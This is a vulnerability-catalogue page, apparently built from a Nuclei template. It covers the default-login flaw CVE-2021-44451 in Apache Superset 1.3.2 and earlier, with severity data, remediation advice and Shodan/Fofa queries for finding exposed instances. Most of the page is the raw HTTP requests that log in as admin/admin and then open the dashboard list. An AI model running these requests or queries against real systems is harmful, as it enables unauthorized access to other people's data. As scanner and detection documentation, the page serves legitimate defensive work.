| Title | Apache Superset <=1.3.2 - Default Login |
|---|---|
| Author | dhiyaneshDK |
| Severity | Medium |
| Impact | An attacker can gain unauthorized access to the Apache Superset application. |
| Remediation | Upgrade to Apache Superset 1.4.0 or higher. |
| CVSS Score | 6.5 |
| EPSS Score | 0.71271 |
| CVE ID | CVE-2021-44451 |
| CWE ID | CWE-522 |
| Shodan Query | http.favicon.hash:1582430156http.html:"apache superset" |
| Fofa Query | body="apache superset"icon_hash=1582430156 |
| Tags | cve2021 cve apache superset default-login vuln |
Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations.
GET /login/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Connection: close
Accept-Encoding: gzip
POST /login/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15
Connection: close
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
csrf_token=ATgfz6&username=admin&password=admin
GET /dashboard/list/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-44451.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-44451.pcap
N/AN/A